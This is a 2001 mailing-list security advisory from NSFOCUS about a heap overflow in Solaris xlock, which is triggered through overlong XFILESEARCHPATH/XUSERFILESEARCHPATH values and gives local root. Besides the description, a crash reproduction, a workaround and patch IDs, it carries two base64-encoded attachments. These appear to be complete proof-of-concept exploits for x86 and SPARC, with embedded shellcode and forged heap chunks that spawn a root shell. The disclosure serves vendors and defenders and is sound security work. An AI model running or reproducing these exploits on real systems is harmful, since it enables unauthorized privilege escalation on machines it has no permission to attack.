Date: Fri, 10 Aug 2001 16:49:42 +0800
From: Nsfocus Security Team <[email protected]>
To: "[email protected]" <[email protected]>
Subject: NSFOCUS SA2001-05 : Solaris Xlock Heap Overflow Vulnerability
--=====_Dragon270425467713_=====
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable
NSFOCUS Security Advisory(SA2001-05)
Topic: Solaris Xlock Heap Overflow Vulnerability
Release Date=A3=BA 2001-08-10
CVE CAN ID : CAN-2001-0652
BUGTRAQ ID : 3160
Affected system:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Sun Solaris 2.6 (SPARC/x86)
Sun Solaris 7 (SPARC/x86)
Sun Solaris 8 (SPARC/x86)
Impact:
=3D=3D=3D=3D=3D=3D=3D=3D=3D
NSFOCUS Security Team has found a heap buffer overflow=
vulnerability in the
xlock shipped in Solaris system when handling some environment=
variables.
Exploitation of it would allow a local attacker to obtain root=
privilege.
Description=A3=BA
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Xlock is a screen-locking tool of Solaris OpenView. It locks the=
X server until
a password is entered. It is installed suid root by default.
It has an invalid boundary check in some environment variable=
handling. As the
result, an attacker could overwrite dynamic memory boundary of=
heap area,
run arbitrary code as root with carefully constructed overflow=
data.
The problem is within these two environment variables:=
"XFILESEARCHPATH" and
"XUSERFILESEARCHPATH". Xlock calls malloc() to allocate 1024=
bytes memory and
save the environment variable value in this dynamic memory. But=
xlock does not
provide length check of environment variable when copying. In=
case that these
two environment variables are set to be a string longer than 1024=
bytes, a heap
overflow might occur. Adjacent dynamic memory boundary tags could=
be
overwritten, and segment fault would occur when malloc() is=
called next time.
Some special "feature" of libc malloc()/free() implementation=
could be used to
rewrite arbitrary memory like saved returned address and function=
pointer or
other important data with carefully formed overflow data.
Exploiting this vulnerability successfully would give an attacker=
root privilege.
Exploit:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
bash-2.03$ uname -a
SunOS sun8 5.8 Generic sun4u sparc SUNW,Ultra-5_10
bash-2.03$ cp /usr/openwin/bin/xlock /tmp/xlock
bash-2.03$ export XFILESEARCHPATH=3D`perl -e 'print "A"x1028'`
bash-2.03$ /tmp/xlock
Segmentation Fault
bash-2.03$ truss -u libc:malloc,free /tmp/xlock
<...snip...>
<- libc:malloc() =3D 0x1135d0
-> libc:malloc(0x400, 0xffbefa8d, 0xffffffff, 0x1b648)
<- libc:malloc() =3D 0x1139d0
open("AAAAAAA...AAAAAAAAAAAAAAA", O_RDONLY) Err#78 ENAMETOOLONG
-> libc:free(0x1139d0, 0x0, 0xff31c000, 0x1b648)
<- libc:free() =3D 0
-> libc:malloc(0x400, 0x12, 0x0, 0x10ed49)
<- libc:malloc() =3D 0x1139d0
open("/export/home/test/XLock", O_RDONLY) Err#2 ENOENT
-> libc:free(0x1139d0, 0x0, 0xff31c000, 0x7efefeff)
<- libc:free() =3D 0
-> libc:malloc(0x3, 0x3073b, 0xffffffff, 0x3a300000)
<- libc:malloc() =3D 0x1135e0
Incurred fault #6, FLTBOUNDS %pc =3D 0xFF0C0F4C
siginfo: SIGSEGV SEGV_MAPERR addr=3D0x41527F18
Received signal #11, SIGSEGV [default]
siginfo: SIGSEGV SEGV_MAPERR addr=3D0x41527F18
*** process killed ***
Proof of concept codes for this issue will be available at:
http://www.nsfocus.com/proof/sol_sparc_xlockex.chttp://www.nsfocus.com/proof/sol_x86_xlockex.c
Workaround:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
Drop the suid root attribute of xlock:
# chmod a-s /usr/openwin/bin/xlock
Vendor Status:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
2001.6.11 We informed Sun of this problem.
2001.6.14 Sun replied that the problem had been reproduced=
and they
had started to develop relevant patches.
2001.8.8 Sun informed us that the development of patches=
had finished and
would be released at the end of the month.
2001.8.9 Sun provided us with IDs of the patches to be=
released.
Sun's patches to be released for this vulnerability:
SPARC x86
--------- ---------
Solaris 8 108652-38 108653-33
Solaris 7 108376-30 108377-26
Solaris 2.6 105633-60 106248-45
Security patches of Sun Inc. are available at:
http://sunsolve.sun.com/securitypatch
Additional Information:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
The Common Vulnerabilities and Exposures (CVE) project has
assigned the name CAN-2001-0652 to this issue. This is a
candidate for inclusion in the CVE list (http://cve.mitre.org),
which standardizes names for security problems. Candidates
may change significantly before they become official CVE=
entries.
DISCLAIMS:
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D
THE INFORMATION PROVIDED IS RELEASED BY NSFOCUS "AS IS" WITHOUT=
WARRANTY
OF ANY KIND. NSFOCUS DISCLAIMS ALL WARRANTIES, EITHER EXPRESS OR=
IMPLIED,
EXCEPT FOR THE WARRANTIES OF MERCHANTABILITY. IN NO EVENTSHALL=
NSFOCUS
BE LIABLE FOR ANY DAMAGES WHATSOEVER INCLUDING DIRECT, INDIRECT,=
INCIDENTAL,CONSEQUENTIAL, LOSS OF BUSINESS PROFITS OR SPECIAL=
DAMAGES,
EVEN IF NSFOCUS HAS BEEN ADVISED OF THE POSSIBILITY OF SUCH=
DAMAGES.
DISTRIBUTION OR REPRODUTION OF THE INFORMATION IS PROVIDED THAT=
THE
ADVISORY IS NOT MODIFIED IN ANY WAY.
Copyright 1999-2001 NSFOCUS. All Rights Reserved. Terms of use.
NSFOCUS Security Team <[email protected]>
NSFOCUS INFORMATION TECHNOLOGY CO.,LTD
(http://www.nsfocus.com)
--=====_Dragon270425467713_=====
Content-Type: application/octet-stream; name="sol_x86_xlockex.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="sol_x86_xlockex.c"
LyoNCiAqICBzb2xfeDg2X3hsb2NrZXguYyAtIFByb29mIG9mIENvbmNlcHQgQ29kZSBmb3IgeGxv
Y2sgaGVhcCBvdmVyZmxvdyBidWcuDQogKiAgQ29weXJpZ2h0IChjKSAyMDAxIC0gTnNmb2N1cy5j
b20NCiAqDQogKiAgVGVzdGVkIGluIFNvbGFyaXMgOCB4ODYuDQogKg0KICogIERJU0NMQUlNUzoN
CiAqICBUaGlzICBpcyBhIHByb29mIG9mIGNvbmNlcHQgY29kZS4gIFRoaXMgY29kZSBpcyBmb3Ig
dGVzdCBwdXJwb3NlIA0KICogIG9ubHkgYW5kIHNob3VsZCBub3QgYmUgcnVuIGFnYWluc3QgYW55
IGhvc3Qgd2l0aG91dCBwZXJtaXNzaW9uIGZyb20gDQogKiAgdGhlIHN5c3RlbSBhZG1pbmlzdHJh
dG9yLg0KICogDQogKiAgTlNGT0NVUyBTZWN1cml0eSBUZWFtIDxzZWN1cml0eUBuc2ZvY3VzLmNv
bT4NCiAqICBodHRwOi8vd3d3Lm5zZm9jdXMuY29tDQogKi8NCiANCiNpbmNsdWRlIDxzdGRpby5o
Pg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHVuaXN0ZC5oPg0KI2luY2x1ZGUgPHN0
cmluZ3MuaD4NCiNpbmNsdWRlIDxzeXMvdHlwZXMuaD4NCg0KI2RlZmluZSBSRVRMT0MgIDB4MDgw
NDYzYzggIC8qIGRlZmF1bHQgcmV0cnVuIGFkZHJlc3MgbG9jYXRpb24gKFNvbGFyaXMgOCB4ODYp
ICovDQojZGVmaW5lIFNQICAgICAgMHgwODA0N2ZmYyAgLyogZGVmYXVsdCAiYm90dG9tIiBzdGFj
ayBhZGRyZXNzIChTb2xhcmlzIDggeDg2KSAqLw0KDQojZGVmaW5lIFZVTFBST0cgIi91c3Ivb3Bl
bndpbi9iaW4veGxvY2siDQoNCmNoYXIgICAgICAgICAgICBzaGVsbGNvZGVbXSA9ICAgICAgICAg
ICANCiJceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTAiIA0K
Ilx4ZWJceDI4XHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MCINCiJceDkw
XHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTAiDQoiXHg5MFx4OTBc
eDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwIg0KIlx4OTBceDkwXHg5MFx4
OTBceDkwXHg5MFx4OTBceDkwXHg5MFx4OTBceDkwXHg5MCINCiJceDhiXHhlY1x4ODNceGVjXHg2
NFx4MzNceGQyXHhjNlx4NDVceGNlXHg5YVx4ODkiDQoiXHg1NVx4Y2ZceDg5XHg1NVx4ZDNceGM2
XHg0NVx4ZDNceDA3XHhjNlx4NDVceGQ1Ig0KIlx4YzNceDg5XHg1NVx4ZmNceDgzXHhlZFx4MzJc
eDMzXHhjMFx4NTBceDUwXHhiMCINCiJceGNhXHhmZlx4ZDVceDgzXHhjNFx4MDhceDMxXHhjMFx4
NTBceDY4XHgyZlx4MmYiDQoiXHg3M1x4NjhceDY4XHgyZlx4NjJceDY5XHg2ZVx4ODlceGUzXHg1
MFx4NTNceDg5Ig0KIlx4ZTJceDUwXHg1Mlx4NTNceGIwXHgzYlx4ZmZceGQ1IjsNCg0KaW50IA0K
bWFpbihpbnQgYXJnYywgY2hhciAqKmFyZ3YpDQp7DQogICAgICAgIGNoYXIgICAgICAgICAgICBi
dWZbMjA0OF0sIGZha2VfY2h1bmtbNDhdOw0KICAgICAgICBsb25nICAgICAgICAgICAgcmV0YWRk
ciwgc3BfYWRkciA9IFNQOw0KICAgICAgICBjaGFyICAgICAgICAgICAqYXJnWzI0XSwgKmVudlsy
NF07DQogICAgICAgIGxvbmcgICAgICAgICAgICByZXRsb2MgPSBSRVRMT0M7DQogICAgICAgIHVu
c2lnbmVkIGludCAgICpwdHI7DQogICAgICAgIGNoYXIgICAgICAgICAgICBldjFbXT0iWFVTRVJG
SUxFU0VBUkNIUEFUSD0iOw0KICAgICAgICBsb25nICAgICAgICAgICAgZXYxX2xlbjsNCiAgICAg
ICAgbG9uZyAgICAgICAgICAgIG92ZXJidWZsZW4gPSAxMDI0OyAgICAgICAgDQoNCiAgICAgICAg
aWYgKGFyZ2MgPiAxKSAvKiBhZGp1c3QgcmV0bG9jICovDQogICAgICAgICAgICAgICAgcmV0bG9j
ICs9IGF0b2koYXJndlsxXSk7DQoNCiAgICAgICAgYnplcm8oYnVmLCBzaXplb2YoYnVmKSk7DQog
ICAgICAgIGV2MV9sZW4gPSBzdHJsZW4oZXYxKTsNCiAgICAgICAgbWVtY3B5KGJ1ZiwgZXYxLCBl
djFfbGVuKTsNCiAgICAgICAgbWVtc2V0KGJ1ZiArIGV2MV9sZW4sICdBJywgb3ZlcmJ1ZmxlbiAr
IHNpemVvZihmYWtlX2NodW5rKSk7DQoNCiAgICAgICAgYXJnWzBdID0gVlVMUFJPRzsNCiAgICAg
ICAgYXJnWzFdID0gTlVMTDsNCg0KICAgICAgICBlbnZbMF0gPSBzaGVsbGNvZGU7ICAgICAvKiBw
dXQgc2hlbGxjb2RlIGluIGVudiAqLw0KICAgICAgICBlbnZbMV0gPSBidWY7ICAgICAgICAgICAv
KiBwdXQgb3ZlcmZsb3cgZW52aXJvbiAqLw0KICAgICAgICBlbnZbMl0gPSBOVUxMOyAgICAgICAg
ICAvKiBlbmQgb2YgZW52ICovDQogICAgICAgIA0KICAgICAgICAvKiBnZXQgdGhlIG5vdCBleGFj
dCBzaGVsbGNvZGUgYWRkcmVzcyA6KSAqLw0KICAgICAgICByZXRhZGRyID0gc3BfYWRkciAtIHN0
cmxlbihWVUxQUk9HKSAtIDENCiAgICAgICAgICAgICAgICAgICAgICAgICAgLSBzdHJsZW4oImk4
NnBjIikgLSAxIA0KICAgICAgICAgICAgICAgICAgICAgICAgICAtIHN0cmxlbihidWYpIC0gMQ0K
ICAgICAgICAgICAgICAgICAgICAgICAgICAtIHN0cmxlbihzaGVsbGNvZGUpIC0gMTsNCg0KICAg
ICAgICBwcmludGYoIlVzaW5nIFJFVCBhZGRyZXNzID0gMHglbHhcbiIsIHJldGFkZHIpOw0KICAg
ICAgICBwcmludGYoIlVzaW5nIHJldGxvYyA9IDB4JWx4IFxuIiwgcmV0bG9jKTsNCg0KICAgICAg
ICBwdHIgPSAodW5zaWduZWQgaW50ICopIGZha2VfY2h1bms7DQogICAgICAgIG1lbXNldChmYWtl
X2NodW5rLCAnXHhmZicsIHNpemVvZihmYWtlX2NodW5rKSk7DQogICAgICAgICoocHRyICsgMCkg
PSAweGZmZmZmZmY5Ow0KICAgICAgICAqKHB0ciArIDIpID0gcmV0YWRkcjsNCiAgICAgICAgKihw
dHIgKyA4KSA9IHJldGxvYyAtIDg7DQoNCiAgICAgICAgbWVtY3B5KGJ1ZiArIGV2MV9sZW4gKyBv
dmVyYnVmbGVuLCBmYWtlX2NodW5rLCBzaXplb2YoZmFrZV9jaHVuaykpOw0KDQogICAgICAgIGV4
ZWN2ZShWVUxQUk9HLCBhcmcsIGVudik7DQogICAgICAgIHBlcnJvcigiZXhlY2xlIik7DQogICAg
ICAgIHJldHVybigxKTsNCn0gIC8qIEVuZCBvZiBtYWluICov
--=====_Dragon270425467713_=====
Content-Type: application/octet-stream; name="sol_sparc_xlockex.c"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="sol_sparc_xlockex.c"
LyoNCiAqICBzb2xfc3BhcmNfeGxvY2tleC5jIC0gUHJvb2Ygb2YgQ29uY2VwdCBDb2RlIGZvciB4
bG9jayBoZWFwIG92ZXJmbG93IGJ1Zy4NCiAqICBDb3B5cmlnaHQgKGMpIDIwMDEgLSBOc2ZvY3Vz
LmNvbQ0KICoNCiAqICBUZXN0ZWQgaW4gU29sYXJpcyAyLjYvNy84IFNQQVJDDQogKg0KICogIERJ
U0NMQUlNUzoNCiAqICBUaGlzICBpcyBhIHByb29mIG9mIGNvbmNlcHQgY29kZS4gIFRoaXMgY29k
ZSBpcyBmb3IgdGVzdCBwdXJwb3NlIA0KICogIG9ubHkgYW5kIHNob3VsZCBub3QgYmUgcnVuIGFn
YWluc3QgYW55IGhvc3Qgd2l0aG91dCBwZXJtaXNzaW9uIGZyb20gDQogKiAgdGhlIHN5c3RlbSBh
ZG1pbmlzdHJhdG9yLg0KICogDQogKiAgTlNGT0NVUyBTZWN1cml0eSBUZWFtIDxzZWN1cml0eUBu
c2ZvY3VzLmNvbT4NCiAqICBodHRwOi8vd3d3Lm5zZm9jdXMuY29tDQogKi8NCiANCiNpbmNsdWRl
IDxzdGRpby5oPg0KI2luY2x1ZGUgPHN0ZGxpYi5oPg0KI2luY2x1ZGUgPHN5cy9zeXN0ZW1pbmZv
Lmg+DQoNCiNkZWZpbmUgUkVUTE9DICAweGZmYmVlOGM0ICAvKiBkZWZhdWx0ICJyZXR1cm4gYWRk
cmVzcyIgbG9jYXRpb24gKFNvbGFyaXMgNykgKi8NCiNkZWZpbmUgU1AgICAgICAweGZmYmVmZmZj
ICAvKiBkZWZhdWx0ICJib3R0b20iIHN0YWNrIGFkZHJlc3MgKFNvbGFyaXMgNy84KSAqLw0KDQoj
ZGVmaW5lIFZVTFBST0cgIi91c3Ivb3Blbndpbi9iaW4veGxvY2siDQoNCiNkZWZpbmUgTk9QICAg
ICAweGFhMWQ0MDE1ICAgICAgLyogInhvciAlbDUsICVsNSwgJWw1IiAqLw0KDQoNCmNoYXIgICAg
ICAgICAgICBzaGVsbGNvZGVbXSA9ICAgICAgICAgICAvKiBmcm9tIHNjeidzIHNoZWxsY29kZSBm
b3IgU1BBUkMgKi8NCiJceDIwXHhiZlx4ZmZceGZmXHgyMFx4YmZceGZmXHhmZlx4N2ZceGZmXHhm
Zlx4ZmZceGFhXHgxZFx4NDBceDE1IiAgDQoiXHg4MVx4YzNceGUwXHgxNFx4YWFceDFkXHg0MFx4
MTVceGFhXHgxZFx4NDBceDE1XHg5MFx4MDhceDNmXHhmZiINCiJceDgyXHgxMFx4MjBceDhkXHg5
MVx4ZDBceDIwXHgwOFx4OTBceDA4XHgzZlx4ZmZceDgyXHgxMFx4MjBceDE3Ig0KIlx4OTFceGQw
XHgyMFx4MDhceDIwXHg4MFx4NDlceDczXHgyMFx4ODBceDYyXHg2MVx4MjBceDgwXHg3M1x4NjUi
DQoiXHgyMFx4ODBceDNhXHgyOVx4N2ZceGZmXHhmZlx4ZmZceDk0XHgxYVx4ODBceDBhXHg5MFx4
MDNceGUwXHgzNCINCiJceDkyXHgwYlx4ODBceDBlXHg5Y1x4MDNceGEwXHgwOFx4ZDBceDIzXHhi
Zlx4ZjhceGMwXHgyM1x4YmZceGZjIg0KIlx4YzBceDJhXHgyMFx4MDdceDgyXHgxMFx4MjBceDNi
XHg5MVx4ZDBceDIwXHgwOFx4OTBceDFiXHhjMFx4MGYiDQoiXHg4Mlx4MTBceDIwXHgwMVx4OTFc
eGQwXHgyMFx4MDhceDJmXHg2Mlx4NjlceDZlXHgyZlx4NzNceDY4XHhmZiI7DQoNCi8qIGdldCBj
dXJyZW50IHN0YWNrIHBvaW50IGFkZHJlc3MgKi8NCmxvbmcNCmdldF9zcCh2b2lkKQ0Kew0KICAg
ICAgICBfX2FzbV9fKCJtb3YgJXNwLCVpMCIpOw0KfQ0KDQpsb25nIA0KZ2V0X3NoZWxsYWRkcihs
b25nIHNwX2FkZHIsIGNoYXIgKiphcmcsIGNoYXIgKiplbnYpDQp7DQogICAgICAgIGxvbmcgICAg
ICAgICAgICByZXRhZGRyOw0KICAgICAgICBpbnQgICAgICAgICAgICAgaTsNCiAgICAgICAgY2hh
ciAgICAgICAgICAgIHBsYXRbMjU2XTsNCiAgICAgICAgY2hhciAgICAgICAgICAgIHBhZCA9IDAs
IHBhZDE7DQogICAgICAgIGludCAgICAgICAgICAgICBlbnZfbGVuLCBhcmdfbGVuLCBsZW47DQoN
Cg0KICAgICAgICAvKiBjYWxjdWxhdGUgdGhlIGxlbmd0aCBvZiAiVlVMUFJPRyIgKyBhcmd2W10g
Ki8NCiAgICAgICAgZm9yIChpID0gMCwgYXJnX2xlbiA9IDA7IGFyZ1tpXSE9TlVMTCA7IGkrKykg
ew0KICAgICAgICAgICAgICAgIGFyZ19sZW4gKz0gc3RybGVuKGFyZ1tpXSkgKyAxOw0KICAgICAg
ICB9DQoNCiAgICAgICAgDQogICAgICAgIC8qIGNhbGN1bGF0ZSB0aGUgcGFkIG51bW1iZXIgLiAq
Lw0KICAgICAgICBwYWQgPSAzIC0gYXJnX2xlbiAlIDQ7DQogICAgICAgIHByaW50Zigic2hlbGxj
b2RlIGFkZHJlc3MgcGFkZGluZyA9ICVkXG4iLCBwYWQpOw0KDQogICAgICAgIG1lbXNldChlbnZb
MF0sICdBJywgcGFkKTsNCiAgICAgICAgZW52WzBdW3BhZF0gPSAnXDAnOw0KDQogICAgICAgICAg
ICAgICAgLyogZ2V0IGVudmlyb24gbGVuZ3RoICovDQogICAgICAgIGZvciAoaSA9IDAsIGVudl9s
ZW4gPSAwOyBlbnZbaV0hPU5VTEw7IGkrKykgew0KICAgICAgICAgICAgICAgIGVudl9sZW4gKz0g
c3RybGVuKGVudltpXSkgKyAxOw0KICAgICAgICB9DQoNCiAgICAgICAgLyogZ2V0IHBsYXRmb3Jt
IGluZm8gICovDQogICAgICAgIHN5c2luZm8oU0lfUExBVEZPUk0sIHBsYXQsIDI1Nik7DQoNCiAg
ICAgICAgbGVuID0gYXJnX2xlbiArIGVudl9sZW4gKyBzdHJsZW4ocGxhdCkgKyAxICsgc3RybGVu
KFZVTFBST0cpICsgMTsNCiAgICAgICAgcHJpbnRmKCJzdGFjayBhcmd1bWVudHMgbGVuID0gJSN4
KCVkKVxuIiwgbGVuLCBsZW4pOw0KDQogICAgICAgIHBhZDEgPSBsZW4gJSA0Ow0KDQogICAgICAg
IGlmKHBhZDEgPT0gMyApIHBhZDEgPSA1Ow0KICAgICAgICBlbHNlIHBhZDEgPSA0IC0gcGFkMTsN
Cg0KICAgICAgICBwcmludGYoInRoZSBwYWRkaW5nIHplcm9zIG51bWJlciA9ICVkXG5cbiIsIHBh
ZDEpOw0KDQogICAgICAgIC8qIGdldCB0aGUgZXhhY3Qgc2hlbGxjb2RlIGFkZHJlc3MgKi8NCiAg
ICAgICAgcmV0YWRkciA9IHNwX2FkZHIgLSBwYWQxICAgICAgIC8qIHRoZSB0cmFpbGluZyB6ZXJv
IG51bWJlciAqLw0KICAgICAgICAgICAgICAgICAgICAgICAgICAtIHN0cmxlbihWVUxQUk9HKSAt
IDEgDQogICAgICAgICAgICAgICAgICAgICAgICAgIC0gc3RybGVuKHBsYXQpIC0gMSA7DQoNCiAg
ICAgICAgZm9yKGktLTtpPjA7aS0tKSByZXRhZGRyIC09IHN0cmxlbihlbnZbaV0pICsgMTsgICAg
ICAgICAgICAgICAgDQoNCiAgICAgICAgcHJpbnRmKCJVc2luZyBSRVQgYWRkcmVzcyA9IDB4JXhc
biIsIHJldGFkZHIpOw0KICAgICAgICByZXR1cm4gcmV0YWRkcjsNCg0KfSAvKiBFbmQgb2YgZ2V0
X3NoZWxsYWRkciAqLw0KDQoNCmludCANCm1haW4oaW50IGFyZ2MsIGNoYXIgKiphcmd2KQ0Kew0K
ICAgICAgICBjaGFyICAgICAgICAgICAgYnVmWzIwNDhdLCBmYWtlX2NodW5rWzQ4XTsNCiAgICAg
ICAgbG9uZyAgICAgICAgICAgIHJldGFkZHIsIHNwX2FkZHIgPSBTUDsNCiAgICAgICAgY2hhciAg
ICAgICAgICAgKmFyZ1syNF0sICplbnZbMjRdOw0KICAgICAgICBjaGFyICAgICAgICAgICAgcGFk
ZGluZ1s2NF07DQogICAgICAgIGxvbmcgICAgICAgICAgICByZXRsb2MgPSBSRVRMT0M7DQogICAg
ICAgIHVuc2lnbmVkIGludCAgICpwdHI7DQogICAgICAgIGNoYXIgICAgICAgICAgICBldjFbXT0i
WFVTRVJGSUxFU0VBUkNIUEFUSD0iOw0KICAgICAgICBsb25nICAgICAgICAgICAgZXYxX2xlbjsN
CiAgICAgICAgbG9uZyAgICAgICAgICAgIG92ZXJidWZsZW4gPSAxMDI0Ow0KDQogICAgICAgIGlm
IChhcmdjID4gMSkgLyogeW91IG5lZWQgYWRqdXN0IHJldGxvYyBvZmZzZXQgaW4geW91ciBzeXN0
ZW0gKi8NCiAgICAgICAgICAgICAgICByZXRsb2MgKz0gYXRvaShhcmd2WzFdKTsNCg0KICAgICAg
ICBhcmdbMF0gPSBWVUxQUk9HOw0KICAgICAgICBhcmdbMV0gPSBOVUxMOw0KDQogICAgICAgIGJ6
ZXJvKGJ1Ziwgc2l6ZW9mKGJ1ZikpOw0KICAgICAgICBldjFfbGVuID0gc3RybGVuKGV2MSk7DQog
ICAgICAgIG1lbWNweShidWYsIGV2MSwgZXYxX2xlbik7DQogICAgICAgIG1lbXNldChidWYgKyBl
djFfbGVuLCAnQScsIG92ZXJidWZsZW4gKyBzaXplb2YoZmFrZV9jaHVuaykpOw0KICAgICAgICAN
CiAgICAgICAgZW52WzBdID0gcGFkZGluZzsgICAgICAgLyogcHV0IHBhZGRpbmcgYnVmZmVyIGlu
IGVudiAqLw0KICAgICAgICBlbnZbMV0gPSBzaGVsbGNvZGU7ICAgICAvKiBwdXQgc2hlbGxjb2Rl
IGluIGVudiAqLw0KICAgICAgICBlbnZbMl0gPSBidWY7ICAgICAgICAgICAvKiBwdXQgb3ZlcmZs
b3cgZW52aXJvbiAqLyAgICANCiAgICAgICAgZW52WzNdID0gTlVMTDsgICAgICAgICAgLyogZW5k
IG9mIGVudiAqLw0KDQogICAgICAgIC8qIGdldCBzdGFjayAiYm90dG9tIiBhZGRyZXNzICovDQog
ICAgICAgIGlmKCgodW5zaWduZWQgY2hhcikgKGdldF9zcCgpID4+IDI0KSkgPT0gMHhlZikgeyAv
KiBTb2xhcmlzIDIuNiAqLw0KICAgICAgICAgIHNwX2FkZHIgPSBTUCAtIDB4MGZiZjAwMDA7IA0K
ICAgICAgICAgIHJldGxvYyAtPSAweDBmYmYwMDAwOw0KICAgICAgICB9DQoNCiAgICAgICAgcmV0
YWRkciA9IGdldF9zaGVsbGFkZHIoc3BfYWRkciwgYXJnLCBlbnYpOw0KICAgICAgICBwcmludGYo
IlVzaW5nIHJldGxvYyA9IDB4JXggXG4iLCByZXRsb2MpOw0KICAgICAgICANCiAgICAgICAgbWVt
c2V0KGZha2VfY2h1bmssICdceGZmJywgc2l6ZW9mKGZha2VfY2h1bmspKTsNCiAgICAgICAgcHRy
ID0gKHVuc2lnbmVkIGludCAqKSBmYWtlX2NodW5rOw0KICAgICAgICAqKHB0ciArIDApID0gMHhm
ZmZmZmZmOTsNCiAgICAgICAgKihwdHIgKyAyKSA9IHJldGFkZHIgLSA4Ow0KICAgICAgICAqKHB0
ciArIDgpID0gcmV0bG9jIC0gODsNCg0KICAgICAgICBtZW1jcHkoYnVmICsgZXYxX2xlbiArIG92
ZXJidWZsZW4sIGZha2VfY2h1bmssIHNpemVvZihmYWtlX2NodW5rKSk7DQoNCiAgICAgICAgZXhl
Y3ZlKFZVTFBST0csIGFyZywgZW52KTsNCiAgICAgICAgcGVycm9yKCJleGVjbGUiKTsNCn0gIC8q
IEVuZCBvZiBtYWluICov
--=====_Dragon270425467713_=====--
